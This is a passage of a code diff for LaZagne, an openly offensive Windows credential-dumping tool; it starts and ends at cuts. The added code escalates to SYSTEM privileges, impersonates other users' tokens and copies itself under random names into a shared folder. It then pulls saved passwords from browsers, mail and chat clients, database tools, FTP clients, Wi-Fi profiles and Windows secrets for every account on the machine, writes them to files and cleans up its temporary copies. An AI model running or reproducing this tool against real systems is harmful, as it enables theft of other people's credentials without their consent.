|\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! |\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + constant.file_name_results + '.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + constant.file_name_results + '.txt',"a+b").write(footer) def write_credentials(pwdFound, category, filePath): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p].encode('utf-8')) + "\r\n" tmp = str(tmp) + "\r\n" open(filePath,"a+b").write(tmp) def checks_write(values, category): if values: if "Passwords" not in constant.finalResults: constant.finalResults["Passwords"] = [] constant.finalResults["Passwords"].append([{"Category": category}, values]) # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' print footer # print output if passwords have been found def print_output(software_name, pwdFound, title1 = False): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.INFO) == False: if not title1: Header().title(software_name) toWrite = [] password_category = False for pwd in pwdFound: # detect which kinds of password has been found lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash = [s for s in lower_list if "hash" in s] if hash: password_category = hash # No password found if not password_category: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", '%s found !!!' % password_category[0].title()) toWrite.append(pwd) # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: constant.passwordFound.append(pwd[password_category[0]]) except: pass for p in pwd.keys(): try: print '%s: %s' % (p, pwd[p]) except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print '%s: %s' % (p.encode('utf-8'), pwd[p].encode('utf-8')) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.info("[!] No passwords found\n") def print_debug(error_level, message): # print when password is found if error_level == 'OK': print Fore.GREEN + message + Style.RESET_ALL # print when password is not found elif error_level == 'FAILED': print Style.BRIGHT + Fore.RED + message + Style.RESET_ALL # print messages depending of their criticism elif error_level == 'CRITICAL': logging.critical(Style.BRIGHT + Fore.RED + '[CRITICAL] %s\n' % message + Style.RESET_ALL) elif error_level == 'ERROR': logging.error(Style.BRIGHT + Fore.RED + '[ERROR] %s\n' % message + Style.RESET_ALL) elif error_level == 'WARNING': logging.warning(Fore.CYAN + '[WARNING] %s\n' % message + Style.RESET_ALL) elif error_level == 'DEBUG': logging.debug('[DEBUG] %s\n' % message) elif error_level == 'INFO': logging.info('%s\n' % message) else: logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- def parseJsonResult(jsonString): try: for json in jsonString: if json: print '\n\n########## User: %s ##########\n' % json['User'] if 'Passwords' not in json: print 'No passwords found for this user !' else: for all_passwords in json['Passwords']: # print '- Category: %s' % all_passwords[0]['Category'] print '------------------- %s -----------------' % all_passwords[0]['Category'] for password_by_category in all_passwords[1]: print '\nPassword found !!!' for dic in password_by_category.keys(): try: print '%s: %s' % (dic, password_by_category[dic]) except: print '%s: %s' % (dic, password_by_category[dic].encode('utf-8')) print except Exception as e: print_debug('ERROR', 'Error parsing the json results: %s' % e) print_debug('ERROR', 'json content: %s' % jsonString) def parseJsonResultToBuffer(jsonString): buffer = '' try: for json in jsonString: if json: buffer += '\r\n\r\n########## User: %s ##########\r\n' % json['User'] if 'Passwords' not in json: buffer += 'No passwords found for this user !' else: for all_passwords in json['Passwords']: # print '- Category: %s' % all_passwords[0]['Category'] buffer += '------------------- %s -----------------\r\n' % all_passwords[0]['Category'] for password_by_category in all_passwords[1]: buffer += '\r\nPassword found !!!\r\n' for dic in password_by_category.keys(): try: buffer += '%s: %s\r\n' % (dic, password_by_category[dic]) except: buffer += '%s: %s\r\n' % (dic, password_by_category[dic].encode('utf-8')) buffer += '\r\n' except Exception as e: print_debug('ERROR', 'Error parsing the json results: %s' % e) print_debug('ERROR', 'json content: %s' % jsonString) return buffer \ No newline at end of file diff --git a/Windows/src/LaZagne/laZagne.py b/Windows/src/LaZagne/laZagne.py old mode 100644 new mode 100755 index 1677e8c9..9e23d12b --- a/Windows/src/LaZagne/laZagne.py +++ b/Windows/src/LaZagne/laZagne.py @@ -7,20 +7,36 @@ ############################################################################## # Disclaimer: Do Not Use this program for illegal purposes ;) - import argparse import time, sys, os import logging +import time, tempfile +import shutil +import random +import json +import psutil +import getpass + +# Softwares that passwords can be retrieved without needed to be in the user environmment from softwares.browsers.mozilla import Mozilla +from softwares.wifi.wifipass import WifiPass +from softwares.windows.secrets import Secrets +from softwares.chats.jitsi import Jitsi +from softwares.chats.pidgin import Pidgin +from softwares.databases.dbvis import Dbvisualizer +from softwares.databases.sqldeveloper import SQLDeveloper +from softwares.games.kalypsomedia import KalypsoMedia +from softwares.games.roguestale import RoguesTale +from softwares.sysadmin.filezilla import Filezilla + # Configuration from config.header import Header -from config.write_output import write_header, write_footer, print_footer +from config.write_output import write_header, write_footer, print_footer, print_debug, parseJsonResult, parseJsonResultToBuffer from config.constant import * from config.manageModules import get_categories, get_modules - -# Print the title -Header().first_title() +from config.changePrivileges import ListSids, GetUserName, create_proc_as_sid, rev2self, getsystem, isChildProcess, isProcessStillAlive +from config.get_system_priv import get_system_priv category = get_categories() moduleNames = get_modules() @@ -36,15 +52,31 @@ modules['mails']['thunderbird'] = Mozilla(True) # For thunderbird (firefox and thunderbird use the same class) def output(): - if args['write'] == True: + + if args['write_normal']: constant.output = 'txt' + + if args['write_json']: + constant.output = 'json' + + if args['write_all']: + constant.output = 'all' + + if constant.output: if not os.path.exists(constant.folder_name): os.makedirs(constant.folder_name) + # constant.file_name_results = 'credentials' # let the choice of the name to the user + + if constant.output != 'json': write_header() - del args['write'] + + # Remove all unecessary variables + del args['write_normal'] + del args['write_json'] + del args['write_all'] def verbosity(): - # write on the console + debug file + # Write on the console + debug file if args['verbose']==0: level=logging.CRITICAL elif args['verbose'] == 1: level=logging.INFO elif args['verbose']>=2: level=logging.DEBUG @@ -75,13 +107,13 @@ def launch_module(b): b[i].run() def manage_advanced_options(): - # file used for dictionary attacks + # File used for dictionary attacks if 'path' in args: constant.path = args['path'] if 'bruteforce' in args: constant.bruteforce = args['bruteforce'] - # mozilla advanced options + # Mozilla advanced options if 'manually' in args: constant.manually = args['manually'] if 'specific_path' in args: @@ -92,7 +124,7 @@ def manage_advanced_options(): elif 'browsers' in args['auditType']: constant.mozilla_software = 'Firefox' - # jitsi advanced options + # Jitsi advanced options if 'master_pwd' in args: constant.jitsi_masterpass = args['master_pwd'] @@ -115,6 +147,56 @@ def runAllModules(): constant.mozilla_software = 'Thunderbird' launch_module(modules[categoryName]) + +def childOutput(pid, fileName, isSys): + while True: + # Wait until the child process died + if isProcessStillAlive(pid): + print_debug('INFO', 'The child process is still alive') + time.sleep(2) + + # The child process died + else: + print_debug('INFO', 'The child process has dead') + if os.path.exists(fileName): + try: + with open(fileName, 'r') as jsonFile: + stdoutRes = json.load(jsonFile) + if isSys: + stdoutRes = json.loads(stdoutRes) + os.remove(fileName) + return stdoutRes + except Exception, e: + print_debug('ERROR', e) + if os.path.exists(fileName): + os.remove(fileName) + return '' + else: + print_debug('ERROR', 'Children process did not create a result file') + return '' + +def cleanFileSystem(jsonTmpFile): + # The sleep is used for waiting child process to end + print_debug('INFO', '[!] Wait to all child process finish') + time.sleep(5) + + directory = os.environ['ALLUSERSPROFILE'] + for f in os.listdir(directory): + if f.startswith('AZA') and f.split(".")[0].endswith('AA'): + tmpFile = directory + os.sep + f + try: + os.remove(tmpFile) + print_debug('INFO', '[+] Temporary file deleted: %s' % tmpFile) + except: + print_debug('INFO', '[-] Failed to delete temporary file: %s' % tmpFile) + + elif jsonTmpFile == directory + os.sep + f: + try: + os.remove(jsonTmpFile) + print_debug('INFO', '[+] Temporary file deleted: %s' % jsonTmpFile) + except: + print_debug('INFO', '[-] Failed to delete temporary file: %s' % jsonTmpFile) + # Prompt help if an error occurs class MyParser(argparse.ArgumentParser): def error(self, message): @@ -122,6 +204,10 @@ def error(self, message): self.print_help() sys.exit(2) + +# Print the title +Header().first_title() + parser = MyParser() parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION), help='laZagne version') @@ -135,8 +221,10 @@ def error(self, message): # Output PWrite = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)) -PWrite._optionals.title = 'output' -PWrite.add_argument('-w', dest='write', action= 'store_true', help = 'write a text file on the current directory') +PWrite._optionals.title = 'Output' +PWrite.add_argument('-oN', dest='write_normal', action='store_true', help = 'output file in a readable format') +PWrite.add_argument('-oJ', dest='write_json', action='store_true', help = 'output file in a json format') +PWrite.add_argument('-oA', dest='write_all', action='store_true', help = 'output file in all format') # ------------------------------------------- Add options and suboptions to all modules ------------------------------------------- all_subparser = [] @@ -187,12 +275,288 @@ def error(self, message): start_time = time.time() output() verbosity() -arguments.func() -# Print the number of passwords found -if constant.output == 'txt': - write_footer() -print_footer() +# ------ Part used for user impersonation ------ + +currentUser = getpass.getuser() +argv = vars(arguments)['auditType'] +current_filepath = sys.argv[0] +sids = ListSids() +isSystem = False +stopExecute = True +isChild = isChildProcess(current_filepath) + +# File used to store output for all impersonated user +tmpFile = os.environ['ALLUSERSPROFILE'] + os.sep + 'JANQT1AD.json' + +# Force a child process to write its result to a specific folder +if isChild: + constant.folder_name = os.environ['ALLUSERSPROFILE'] + constant.file_name_results = 'JANQT1AD' + +# Check if we have system privileges +for sid in sids: + if sid[0] == os.getpid(): + if sid[2] == "S-1-5-18": + isSystem = True + +end = False +stdoutRes = [] + +# System privileges +if isSystem: + try: + randomName = ''.join(random.choice("aABCDEFGHIJKLMNOPqrstuvWxYz") for i in range(3)) + dst = os.environ['ALLUSERSPROFILE'] + os.sep + 'AZA' + randomName + 'AA' + '.exe' + shutil.copyfile(current_filepath, dst) + except: + end = True + + if not end: + + # Get a list of user we could impersonate from token + impersonateUsers = {} + impersonated_user = [] + for sid in sids: + if ' NT' not in sid[3].split('\\')[0] and 'NT ' not in sid[3].split('\\')[0] and 'Window' not in sid[3].split('\\')[0]: + if sid[3] not in impersonateUsers.keys(): + impersonateUsers[sid[3]] = [] + impersonateUsers[sid[3]].append(sid[2]) + + # Impersonate an user + try: + for users in impersonateUsers.keys(): + print_debug('INFO', '[!] Impersonate token user of %s' % users.encode('utf-8')) + for sid in impersonateUsers[users]: + try: + pid = int(create_proc_as_sid(sid, "cmd.exe /c %s %s" % (dst, argv))) + + # Wait for the child process to end and keep the output into the stdoutRes variable + stdoutRes.append(childOutput(pid, tmpFile, True)) + + # Store user when the impersonation succeed + try: + impersonated_user.append(users.split('\\')[1]) + except: + pass + + rev2self() + break + except Exception,e: + print_debug('ERROR', e) + pass + except (KeyboardInterrupt, SystemExit): + print_debug('INFO', 'Keyboard interrupt. Cleaning Up') + try: + print_debug('INFO', '[!] Killing child process') + p = psutil.Process(pid) + p.kill() + print_debug('INFO', '[+] Child process killed') + except: + pass + + cleanFileSystem(tmpFile) + sys.exit() + + # Clean file used for impersonation + os.remove(dst) + + # Check users existing on the system + all_users = os.listdir('C:\\Users') + + # Removing all files + for dir_users in all_users: + if os.path.isfile('C:\\Users\\%s' % dir_users): + all_users.remove(dir_users) + + # Removing all default directory + if 'All Users' in all_users: + all_users.remove('All Users') + if 'Default User' in all_users: + all_users.remove('Default User') + if 'Default' in all_users: + all_users.remove('Default') + if 'Public' in all_users: + all_users.remove('Public') + + # Removing user that have already been impersonated + for imper_user in impersonated_user: + if imper_user in all_users: + all_users.remove(imper_user) + + # Ready to check for all users remaining + user_pwd_temp = [] + for user_selected in all_users: + print_debug('INFO', '[!] Trying to impersonate user: %s' % user_selected) + print '\n\n########## User: %s ##########\n' % user_selected + + # Fix value by default for user environnment (appdata and userprofile) + constant.userprofile = 'C:\\Users\\%s\\' % user_selected + constant.appdata = 'C:\\Users\\%s\\AppData\\Roaming\\' % user_selected + + # if isChild: + constant.finalResults = {} + constant.finalResults['User'] = user_selected + + # Try to retrieve all passwords from softwares which do not need to be in the user session + constant.mozilla_software = 'Firefox' + Mozilla(False).run() + constant.mozilla_software = 'Thunderbird' + Mozilla(True).run() + Jitsi().run() + Pidgin().run() + Dbvisualizer().run() + SQLDeveloper().run() + KalypsoMedia().run() + RoguesTale().run() + Filezilla().run() + + if isChild: + stdoutRes.append(constant.finalResults) + + # Used to write the passwords found into the json - txt file + else: + user_pwd_temp.append(constant.finalResults) + + constant.finalResults = {} + constant.finalResults['User'] = "SYSTEM" + + # Is a child process + if isChild: + constant.output = 'json' + try: + Secrets().run() + WifiPass().run() + except Exception,e: + print_debug('ERROR', e) + pass + stdoutRes.append(constant.finalResults) + + # Write output to a tmp file + with open(tmpFile, "w+") as f: + json.dump(stdoutRes, f) + + # Is not a child process + else: + # Print the entire output of children results + parseJsonResult(stdoutRes) + + # Get all privilege passwords + print '\n\n########## User: SYSTEM ##########\n' + try: + Secrets().run() + WifiPass().run() + stdoutRes.append(constant.finalResults) + except Exception,e: + print_debug('ERROR', e) + pass + + try: + stdoutRes += user_pwd_temp + if constant.output == 'json' or constant.output == 'all': + with open(constant.folder_name + os.sep + constant.file_name_results + '.json', 'w') as f: + json.dump(json.dumps(stdoutRes), f) + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.json' + + # Write to a txt file + if constant.output != 'json': + with open(constant.folder_name + os.sep + constant.file_name_results + '.txt', 'a+b') as f: + f.write(parseJsonResultToBuffer(stdoutRes).encode('utf-8')) + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.txt' + + except Exception as e: + print_debug('ERROR', 'Error writing the output file: %s' % e) + +else: + if isChild: + # - Normal execution + # - Redirect output to a temp file + # - Quit + constant.output = 'json' + stopExecute = False + else: + print_debug('INFO', 'We do not have system privileges') + + try: + randomName = ''.join(random.choice("aABCDEFGHIJKLMNOPqrstuvWxYz") for i in range(5)) + dst = os.environ['ALLUSERSPROFILE'] + os.sep + 'AZA' + randomName + 'AA' + '.exe' + shutil.copyfile(current_filepath, dst) + + # Trying to get system + print_debug('INFO', 'Trying to get system') + pid = int(getsystem("cmd.exe /c %s %s" % (dst, argv))) + print_debug('INFO', 'Get system privileges, waiting for impersonation process') + + # Wait for the child process to end and keep the output into a variable and print it + chld = childOutput(pid, tmpFile, False) + + # Print final result + parseJsonResult(chld) + + try: + if constant.output == 'json' or constant.output == 'all': + with open(constant.folder_name + os.sep + constant.file_name_results + '.json', 'w') as f: + json.dump(json.dumps(chld), f) + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.json' + + + # Write to a txt file + if constant.output != 'json': + with open(constant.folder_name + os.sep + constant.file_name_results + '.txt', 'a+b') as f: + f.write(parseJsonResultToBuffer(chld).encode('utf-8')) + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.txt' + + except Exception as e: + print_debug('ERROR', 'Error writing the output file: %s' % e) + + # Clean + os.remove(dst) + rev2self() + except Exception as e: + print_debug('ERROR', 'Not enough privileges to get system rights: %s' % e) + # Is not system and is not elevated + # Realize a normal execution + stopExecute = False + except (KeyboardInterrupt, SystemExit): + print_debug('INFO', 'Keyboard interrupt. Cleaning Up') + try: + print_debug('INFO', '[!] Killing child process') + p = psutil.Process(pid) + p.kill() + print_debug('INFO', '[+] Child process killed') + except: + pass + cleanFileSystem(tmpFile) + sys.exit() + +# ------ End of user impersonation ------ + +if not stopExecute: + print '\n\n########## User: %s ##########\n' % currentUser + constant.finalResults['User'] = currentUser + arguments.func() + + if constant.output == 'json' or constant.output == 'all': + if isChild: + with open(constant.folder_name + os.sep + constant.file_name_results + '.json', 'w') as f: + json.dump(json.dumps(constant.finalResults), f) + + # Human readable Json format + else: + prettyJson = json.dumps(constant.finalResults, sort_keys=True, indent=4, separators=(',', ': ')) + with open(constant.folder_name + os.sep + constant.file_name_results + '.json', 'w+') as f: + json.dump(prettyJson, f) + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.json' + + # Print the number of passwords found + if constant.output == 'txt' or constant.output == 'all': + tmp_dic = [constant.finalResults] + with open(constant.folder_name + os.sep + constant.file_name_results + '.txt', 'a+b') as f: + f.write(parseJsonResultToBuffer(tmp_dic)) + write_footer() + print '[+] File written: ' + constant.folder_name + os.sep + constant.file_name_results + '.txt' + + print_footer() elapsed_time = time.time() - start_time print 'elapsed time = ' + str(elapsed_time) diff --git a/Windows/src/LaZagne/softwares/__init__.py b/Windows/src/LaZagne/softwares/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/browsers/__init__.py b/Windows/src/LaZagne/softwares/browsers/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/browsers/chrome.py b/Windows/src/LaZagne/softwares/browsers/chrome.py old mode 100644 new mode 100755 index 2eedd311..b27030c0 --- a/Windows/src/LaZagne/softwares/browsers/chrome.py +++ b/Windows/src/LaZagne/softwares/browsers/chrome.py @@ -6,6 +6,7 @@ from config.write_output import print_output, print_debug from config.header import Header from config.moduleInfo import ModuleInfo +import getpass class Chrome(ModuleInfo): def __init__(self): @@ -18,25 +19,30 @@ def run(self): Header().title_info('Chrome') database_path = '' + homedrive = '' + homepath = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: - # For Win7 - path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get('HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data' - - # For XP - path_XP = os.environ.get('HOMEDRIVE') + os.environ.get('HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data' - - if os.path.exists(path_XP): - database_path = path_XP - - elif os.path.exists(path_Win7): - database_path = path_Win7 - - else: - print_debug('INFO', 'Google Chrome not installed.') - return - else: - print_debug('ERROR', 'Environment variables (HOMEDRIVE or HOMEPATH) have not been found') + homedrive = os.environ.get('HOMEDRIVE') + homepath = os.environ.get('HOMEPATH') + + # All possible path + pathTab = [ + homedrive + homepath + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', + homedrive + homepath + '\AppData\Local\Google\Chrome\User Data\Default\Login Data', + homedrive + '\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', + homedrive + '\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data', + 'C:\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', + 'C:\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data' + ] + + database_path = [p for p in pathTab if os.path.exists(p)] + if not database_path: + print_debug('INFO', 'Google Chrome not installed.') return + + # if many path are valid + if len(database_path) !=1: + database_path = database_path[0] # Copy database before to query it (bypass lock errors) try: @@ -76,7 +82,7 @@ def run(self): print_debug('DEBUG', '{0}'.format(e)) if password: - values['Site'] = result[0] + values['Website'] = result[0] values['Username'] = result[1] values['Password'] = password pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/browsers/ie.py b/Windows/src/LaZagne/softwares/browsers/ie.py old mode 100644 new mode 100755 index 3c6fb976..0e16623a --- a/Windows/src/LaZagne/softwares/browsers/ie.py +++ b/Windows/src/LaZagne/softwares/browsers/ie.py @@ -282,7 +282,7 @@ def decipher_password(self, cipher_text, u): try: if s % 2 != 0: values = {} - values['Site'] = u.decode('UTF-16LE') + values['Website'] = u.decode('UTF-16LE') values['Username'] = secret[length - s] values['Password'] = password pwdFound.append(values) @@ -353,3 +353,7 @@ def run(self, historic=''): else: print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath) + + # Clean up + if os.path.exists(dll_name): + os.remove(dll_name) \ No newline at end of file diff --git a/Windows/src/LaZagne/softwares/browsers/mozilla.py b/Windows/src/LaZagne/softwares/browsers/mozilla.py old mode 100644 new mode 100755 index 0a71114e..c79b9851 --- a/Windows/src/LaZagne/softwares/browsers/mozilla.py +++ b/Windows/src/LaZagne/softwares/browsers/mozilla.py @@ -110,15 +110,22 @@ def __init__(self, isThunderbird = False): ModuleInfo.__init__(self, 'thunderbird', 'browsers', options, suboptions) def get_path(self, software_name): - if 'APPDATA' in os.environ: + + path = '' + if constant.appdata: + if software_name == 'Firefox': + path = '%s\Mozilla\Firefox' % constant.appdata + elif software_name == 'Thunderbird': + path = '%s\Thunderbird' % constant.appdata + + elif 'APPDATA' in os.environ: if software_name == 'Firefox': path = '%s\Mozilla\Firefox' % str(os.environ['APPDATA']) elif software_name == 'Thunderbird': path = '%s\Thunderbird' % str(os.environ['APPDATA']) else: - print_debug('The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: \Application Data\Mozilla\Firefox\Profiles\') - return - + print_debug('DEBUG', 'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: \Application Data\Mozilla\Firefox\Profiles\') + return path def manage_advanced_options(self): diff --git a/Windows/src/LaZagne/softwares/browsers/opera.py b/Windows/src/LaZagne/softwares/browsers/opera.py old mode 100644 new mode 100755 index 154d48a8..9da658fe --- a/Windows/src/LaZagne/softwares/browsers/opera.py +++ b/Windows/src/LaZagne/softwares/browsers/opera.py @@ -148,7 +148,7 @@ def decipher_new_version(self, path): # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: - values['Site'] = result[0] + values['Website'] = result[0] values['Username'] = result[1] values['Password'] = password pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/chats/__init__.py b/Windows/src/LaZagne/softwares/chats/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/chats/jitsi.py b/Windows/src/LaZagne/softwares/chats/jitsi.py old mode 100644 new mode 100755 index 06fb83c4..febb7922 --- a/Windows/src/LaZagne/softwares/chats/jitsi.py +++ b/Windows/src/LaZagne/softwares/chats/jitsi.py @@ -30,7 +30,13 @@ def get_salt(self): return binascii.unhexlify(hexsalt) def get_path(self): - if 'APPDATA' in os.environ: + if constant.appdata: + directory = '%s\Jitsi\sip-communicator.properties' % constant.appdata + if os.path.exists(directory): + return directory + return 'JITSI_NOT_EXISTS' + + elif 'APPDATA' in os.environ: directory = os.environ.get('APPDATA') + os.sep + 'Jitsi' + os.sep + 'sip-communicator.properties' if os.path.exists(directory): return directory diff --git a/Windows/src/LaZagne/softwares/chats/pbkdf2.py b/Windows/src/LaZagne/softwares/chats/pbkdf2.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/chats/pidgin.py b/Windows/src/LaZagne/softwares/chats/pidgin.py old mode 100644 new mode 100755 index 67014802..42690d33 --- a/Windows/src/LaZagne/softwares/chats/pidgin.py +++ b/Windows/src/LaZagne/softwares/chats/pidgin.py @@ -14,7 +14,11 @@ def run(self): # print title Header().title_info('Pidgin') - if 'APPDATA' in os.environ: + if constant.appdata: + directory = '%s\.purple' % constant.appdata + path = os.path.join(directory, 'accounts.xml') + + elif 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\.purple' path = os.path.join(directory, 'accounts.xml') else: diff --git a/Windows/src/LaZagne/softwares/chats/skype.py b/Windows/src/LaZagne/softwares/chats/skype.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/databases/__init__.py b/Windows/src/LaZagne/softwares/databases/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/databases/dbvis.py b/Windows/src/LaZagne/softwares/databases/dbvis.py old mode 100644 new mode 100755 index 12ceb2e4..e75566cc --- a/Windows/src/LaZagne/softwares/databases/dbvis.py +++ b/Windows/src/LaZagne/softwares/databases/dbvis.py @@ -100,14 +100,19 @@ def get_infos(self, path, passphrase, salt): print_output("DbVisualizer", pwdFound) def get_mainPath(self): - if 'HOMEPATH' in os.environ: + path = '' + if constant.userprofile: + path = '%s\.dbvis' % constant.userprofile + elif 'HOMEPATH' in os.environ: path = os.environ['HOMEPATH'] + os.sep + '.dbvis' - if os.path.exists(path): - return path - else: - return 'DBVIS_NOT_EXISTS' else: return 'var_Env_Not_Found' + + if os.path.exists(path): + return path + else: + return 'DBVIS_NOT_EXISTS' + def run(self): # print title diff --git a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py old mode 100644 new mode 100755 index 39b75348..1f9228f1 --- a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py +++ b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py @@ -36,18 +36,23 @@ def decrypt(self, salt, msg, password): return re.sub(r'[\x01-\x08]','',text) def get_mainPath(self): - if 'APPDATA' in os.environ: + directory = '' + if constant.appdata: + directory = '%s\SQL Developer' % constant.appdata + elif 'APPDATA' in os.environ: directory = os.environ.get('APPDATA') + os.sep + 'SQL Developer' - if os.path.exists(directory): - for d in os.listdir(directory): - if d.startswith('system'): - directory += os.sep + d - return directory - return 'SQL_NO_PASSWD' - else: - return 'SQL_NOT_EXISTS' else: return 'Error' + + if os.path.exists(directory): + for d in os.listdir(directory): + if d.startswith('system'): + directory += os.sep + d + return directory + return 'SQL_NO_PASSWD' + else: + return 'SQL_NOT_EXISTS' + def get_passphrase(self, path): for p in os.listdir(path): diff --git a/Windows/src/LaZagne/softwares/databases/squirrel.py b/Windows/src/LaZagne/softwares/databases/squirrel.py old mode 100644 new mode 100755 index 292aaf81..4f7bed7e --- a/Windows/src/LaZagne/softwares/databases/squirrel.py +++ b/Windows/src/LaZagne/softwares/databases/squirrel.py @@ -11,14 +11,20 @@ def __init__(self): ModuleInfo.__init__(self, 'squirrel', 'database', options) def get_path(self): - if 'HOMEPATH' in os.environ: + path = '' + if constant.userprofile: + path = '%s\.squirrel-sql' % constant.userprofile + + elif 'HOMEPATH' in os.environ: path = os.environ['HOMEPATH'] + os.sep + '.squirrel-sql' - if os.path.exists(path): - return path - else: - return 'Not_Found' else: return 'var_Env_Not_Found' + + if os.path.exists(path): + return path + else: + return 'Not_Found' + def parse_xml(self, xml_file): tree = ET.ElementTree(file=xml_file) diff --git a/Windows/src/LaZagne/softwares/games/__init__.py b/Windows/src/LaZagne/softwares/games/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/games/galconfusion.py b/Windows/src/LaZagne/softwares/games/galconfusion.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/games/kalypsomedia.py b/Windows/src/LaZagne/softwares/games/kalypsomedia.py old mode 100644 new mode 100755 index 1676f645..36e88cde --- a/Windows/src/LaZagne/softwares/games/kalypsomedia.py +++ b/Windows/src/LaZagne/softwares/games/kalypsomedia.py @@ -21,7 +21,10 @@ def run(self): creds = [] key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' - if 'APPDATA' in os.environ: + if constant.appdata: + inifile = '%s\\Kalypso Media\\Launcher\\launcher.ini' % constant.appdata + + elif 'APPDATA' in os.environ: inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini' else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') diff --git a/Windows/src/LaZagne/softwares/games/roguestale.py b/Windows/src/LaZagne/softwares/games/roguestale.py old mode 100644 new mode 100755 index 6a5dd8f2..33621fd1 --- a/Windows/src/LaZagne/softwares/games/roguestale.py +++ b/Windows/src/LaZagne/softwares/games/roguestale.py @@ -15,6 +15,8 @@ def run(self): Header().title_info('Rogue\'s Tale') creds = [] + if constant.userprofile: + directory = '%s\\Documents\\Rogue\'s Tale\\users' % constant.userprofile if 'USERPROFILE' in os.environ: directory = os.environ['USERPROFILE'] + '\\Documents\\Rogue\'s Tale\\users' else: diff --git a/Windows/src/LaZagne/softwares/games/turba.py b/Windows/src/LaZagne/softwares/games/turba.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/mails/__init__.py b/Windows/src/LaZagne/softwares/mails/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/mails/outlook.py b/Windows/src/LaZagne/softwares/mails/outlook.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/svn/__init__.py b/Windows/src/LaZagne/softwares/svn/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/svn/tortoise.py b/Windows/src/LaZagne/softwares/svn/tortoise.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/__init__.py b/Windows/src/LaZagne/softwares/sysadmin/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py old mode 100644 new mode 100755 index c50355ff..c65a5b09 --- a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py +++ b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py @@ -14,7 +14,9 @@ def run(self): # print title Header().title_info('Filezilla') - if 'APPDATA' in os.environ: + if constant.appdata: + directory = '%s\FileZilla' % 